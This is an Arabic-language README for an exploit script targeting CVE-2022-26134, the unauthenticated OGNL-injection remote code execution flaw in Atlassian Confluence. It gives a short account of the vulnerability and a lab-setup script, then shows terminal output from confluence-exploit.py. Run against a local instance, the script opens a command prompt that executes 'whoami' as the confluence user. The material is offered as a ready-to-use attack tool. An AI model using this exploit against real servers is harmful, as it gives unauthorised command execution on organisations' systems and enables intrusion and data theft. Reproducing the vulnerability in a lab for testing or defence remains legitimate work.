
استغلال لـ CVE-2022-26134: تنفيذ عن بعد بدون مصادقة في Confluence عبر حقن OGNL
استغلال آخر في أرض OGNL
Confluence هو نظام ويكي مؤسسي يعتمد على الويب، طورته شركة البرمجيات الأسترالية Atlassian.
في 2 يونيو 2022، أصدرت Atlassian إعلانًا أمنيًا لتطبيقات Confluence Server و Data Center، مسلطة الضوء على ثغرة حرجة تسمح بتنفيذ أوامر عن بُعد بدون مصادقة. تسمح ثغرة حقن OGNL لمستخدم غير موثوق بتنفيذ كود عشوائي على مثيل Confluence Server أو Data Center.
لإعداد بيئة الاختبار الخاصة بك، قم بتشغيل start_conflunce.sh واتبع التعليمات المقدمة هنا.
$ ./confluence-exploit.py
usage: confluence-exploit.py [-h] -u URL
confluence-exploit.py: error: the following arguments are required: -u/--url
$ ./confluence-exploit.py -u http://127.0.0.1:8090
🔗 URL: http://127.0.0.1:8090
👉 (id): whoami
confluence